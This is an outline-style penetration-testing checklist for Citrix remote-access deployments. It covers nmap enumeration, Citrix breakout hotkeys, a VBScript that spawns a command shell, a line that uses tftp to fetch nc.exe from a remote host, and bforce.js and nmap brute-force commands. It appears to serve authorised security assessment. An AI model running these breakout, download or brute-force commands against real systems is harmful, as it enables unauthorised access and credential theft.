
Citrix Specific Testing:
Citrix provides remote access services to multiple users across a wide range of platforms. The following information will help you conduct a vulnerability assessment/penetration test of Citrix implementations.
Enumeration
- web search
- Google (GHDB)
- Google Hacks
- Yahoo
- site search
- generic
- nmap -A -PN -p 80,443,1494 ip_address
- amap -bqv ip_address port_no.
- citrix specific
- Default Ports
- TCP
- Server to server
- Management Console to server
- Session Reliability (Auto-reconnect)
- License Management Console
- License server
- UDP
- nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
Scanning
Exploitation
- Alter default .ica files
- Enumerate and Connect
- Manual Testing
- Create Batch File (cmd.bat)
- Option Explicit
- Dim objShell
- Set objShell = CreateObject("WScript.Shell")
- objShell.Run "%comspec% /k"
- WScript.Quit
- alternative functionality
- objShell.Run "%comspec% /k c: & dir"
- objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
- objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
- AT Command - privilege escalation
- Keyboard Shortcuts/Hotkeys
- Ctrl + h – View History
- Ctrl + n – New Browser
- Shift + Left Click – New Browser
- Ctrl + o – Internet Address (browse feature)
- Ctrl + p – Print (to file)
- Right Click (Shift + F10)
- Save Image As
- View Source
- F1 – Jump to URL
- SHIFT+F1: Local Task List
- SHIFT+F2: Toggle Title Bar
- SHIFT+F3: Close Remote Application
- CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
- CTRL+F2: Remote Task List
- CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
- ALT+F2: Cycle through programs
- ALT+PLUS: Alt+TAB
- ALT+MINUS: ALT+SHIFT+TAB
- Brute Force
- bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
- bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
- bforce.js TCPBrowserAddress=ip-address usernames=user1,user2 passwords=pass1,pass2 timeout=5000
References
- Vulnerabilities
- Support
- Exploits
- Tutorials/Presentations
- Carnal0wnage
- Foundstone
- GNUCitizen
- Packetstormsecurity
- Insomniac Security
- Aditya Sood
- BlackHat